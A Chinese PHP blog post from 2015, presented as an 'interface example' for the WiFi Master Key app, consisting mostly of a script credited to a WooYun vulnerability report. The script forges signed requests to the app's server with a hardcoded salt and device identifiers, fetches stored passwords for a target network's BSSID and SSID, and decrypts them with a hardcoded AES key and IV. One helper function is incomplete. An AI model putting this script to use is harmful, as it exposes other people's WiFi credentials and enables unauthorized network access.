编程 PHP

WIFI万能钥匙密码查询接口实例

Posted in PHP onSeptember 28, 2015

不废话了，直接给大家贴代码了

<?php //some code from http://www.wooyun.org/bugs/wooyun-2015-099268
$bssid = "c8:3a:35:fa:b8:80" ;
$ssid = "Podinns2F03" ;
if (isset( $bssid ) && isset( $ssid )){
//update salt
   $ret = request( $bssid , $ssid , md5(rand(1, 10000)));
   $ret = json_decode( $ret );
   $ret = request( $bssid , $ssid , $ret ->retSn);
   $ret = json_decode( $ret );
   if ( $ret ->retCd == 0){
     if ( $ret ->qryapwd->retCd == 0){
       $list = $ret ->qryapwd->psws;
       foreach ( $list as $wifi ){
         echo 'SSID: ' . $wifi ->ssid. "\n" ;
         echo 'PWD: ' .decryptStrin( $wifi ->pwd). "\n" ;
         echo 'BSSID: ' . $wifi ->bssid. "\n" ;
         if ( $wifi ->xUser){
           echo 'xUser: ' . $wifi ->xUser. "\n" ;
           echo 'xPwd: ' . $wifi ->xPwd. "\n" ;
         }
       }
     }
     else {
       echo $ret ->qryapwd->retMsg;
     }
   }
}
function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
   $data = array ();
   $data [ 'appid' ] = '0008' ;
   $data [ 'bssid' ] = $bssid ;
   $data [ 'chanid' ] = 'gw' ;
   $data [ 'dhid' ] = $dhid ;
   $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
   $data [ 'lang' ] = 'cn' ;
   $data [ 'mac' ] = '60f81dad28de' ;
   $data [ 'method' ] = 'getDeepSecChkSwitch' ;
   $data [ 'pid' ] = 'qryapwd:commonswitch' ;
   $data [ 'ssid' ] = $ssid ;
   $data [ 'st' ] = 'm' ;
   $data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
   $data [ 'v' ] = '324' ;
   $data [ 'sign' ] = sign( $data , $salt );
   $curl = curl_init();
   curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
   curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );
   curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
   curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
   curl_setopt( $curl , CURLOPT_POST, true); // enable posting
   curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
   curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
   $r = curl_exec( $curl );
   curl_close( $curl );
   return $r ;
}
function registerNewDevice(){
   $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$' ;
   $data = array ();
   $data [ 'appid' ] = '0008' ;
   $data [ 'bssid' ] = $bssid ;
   $data [ 'chanid' ] = 'gw' ;
   $data [ 'dhid' ] = $dhid ;
   $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
   $data [ 'lang' ] = 'cn' ;
   $data [ 'mac' ] = '60f81dad28de' ;
   $data [ 'method' ] = 'getDeepSecChkSwitch' ;
   $data [ 'pid' ] = 'qryapwd:commonswitch' ;
   $data [ 'ssid' ] = $ssid ;
   $data [ 'st' ] = 'm' ;
   $data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
   $data [ 'v' ] = '324' ;
   $data [ 'sign' ] = sign( $data , $salt );
}
function sign( $array , $salt ){
   // 签名算法
   $request_str = '' ;
   // 对应apk中的 Arrays.sort 数组排序，测试PHP需用 ksort
   ksort( $array );
   foreach ( $array as $key => $value ) {
     $request_str .= $value ;
   }
   $sign = md5( $request_str . $salt );
   return strtoupper ( $sign );
}
function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){
   //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
   //[length][password][timestamp]
   $decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
   return substr (trim( $decrypted_string ),3,-13);
} ?>

以上代码很简单吗，WIFI万能钥匙密码查询接口代码就全部写完了，希望大家喜欢。

WIFI万能钥匙密码查询接口实例

- Author -

mrr

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

VFP与其他应用程序的集成

Oct 09 PHP

随机头像PHP版

Oct 09 PHP

一步一步学习PHP(2)――PHP类型

Feb 15 PHP

php格式输出文件var_export函数实例

Nov 15 PHP

thinkPHP中验证码的简单使用方法

Dec 26 PHP

thinkphp框架实现数据添加和显示功能

Jun 29 PHP

PHP Cookie学习笔记

Aug 23 PHP

php实现的redis缓存类定义与使用方法示例

Aug 09 PHP

PHP文件系统管理(实例讲解)

Sep 19 PHP

PHP长连接实现与使用方法详解

Feb 11 PHP

PHP实现Redis单据锁以及防止并发重复写入

Apr 10 PHP

Yii使用EasyWechat实现小程序获取用户的openID的方法

Apr 29 PHP

百万级别知乎用户数据抓取与分析之PHP开发

Sep 28 #PHP

培养自己的php编码规范

Sep 28 #PHP

ThinkPHP数据操作方法总结

Sep 28 #PHP

ThinkPHP表单数据智能写入create方法实例分析

Sep 27 #PHP

PHP+MySQL之Insert Into数据插入用法分析

Sep 27 #PHP

ThinkPHP中数据操作案例分析

Sep 27 #PHP

PHP中两个float(浮点数)比较实例分析

Sep 27 #PHP

You might like

PHP 中执行排序与 MySQL 中排序

2009/04/21 PHP

PHP nl2br函数将换行字符转成 &lt;br&gt;

2009/08/21 PHP

php的ajax简单实例

2014/02/27 PHP

Codeigniter的一些优秀特性总结

2015/01/21 PHP

PHP实现多文件上传的方法

2015/07/08 PHP

PHP程序中的文件锁、互斥锁、读写锁使用技巧解析

2016/03/21 PHP

Laravel5.7 Eloquent ORM快速入门详解

2019/04/12 PHP

PHP如何实现阿里云短信sdk灵活应用在项目中的方法

2019/06/14 PHP

如何用javascript控制上传文件的大小

2006/10/26 Javascript

IE不出现Flash激活框的小发现的js实现方法

2007/09/07 Javascript

一段利用WSH获取登录时间的jscript代码

2008/05/11 Javascript

js身份证验证超强脚本

2008/10/26 Javascript

javascript 关闭IE6、IE7

2009/06/01 Javascript

jquery的live使用注意事项

2014/02/18 Javascript

推荐阅读的js快速判断IE浏览器(兼容IE10与IE11)

2015/12/13 Javascript

谈谈JavaScript的New关键字

2016/08/26 Javascript

BootStrap框架中的data-[ ]自定义属性理解(推荐)

2017/02/14 Javascript

使用bootstrap-paginator.js 分页来进行ajax 异步分页请求示例

2017/03/09 Javascript

js实现倒计时关键代码

2017/05/05 Javascript

利用angular、react和vue实现相同的面试题组件

2018/02/19 Javascript

vue-cli与webpack处理静态资源的方法及webpack打包的坑

2018/05/15 Javascript

ES6知识点整理之函数对象参数默认值及其解构应用示例

2019/04/17 Javascript

python实现调用其他python脚本的方法

2014/10/05 Python

Python通过select实现异步IO的方法

2015/06/04 Python

对pandas中to_dict的用法详解

2018/06/05 Python

python列表推导式入门学习解析

2019/12/02 Python

给keras层命名,并提取中间层输出值,保存到文档的实例

2020/05/23 Python

详解解决jupyter不能使用pytorch的问题

2021/02/18 Python

英国顶尖手表珠宝品牌独家授权经销商：HS Johnson

2020/10/28 全球购物

汽车运用工程专业毕业生推荐信

2013/12/25 职场文书

上课睡觉万能检讨书

2015/02/17 职场文书

欢送会主持词

2015/07/01 职场文书

大队委员竞选稿

2015/11/20 职场文书

MATLAB 如何求取离散点的曲率最大值

2021/04/16 Python

python 多态协议鸭子类型详解

2021/11/27 Python

使用Redis实现分布式锁的方法

2022/06/16 Redis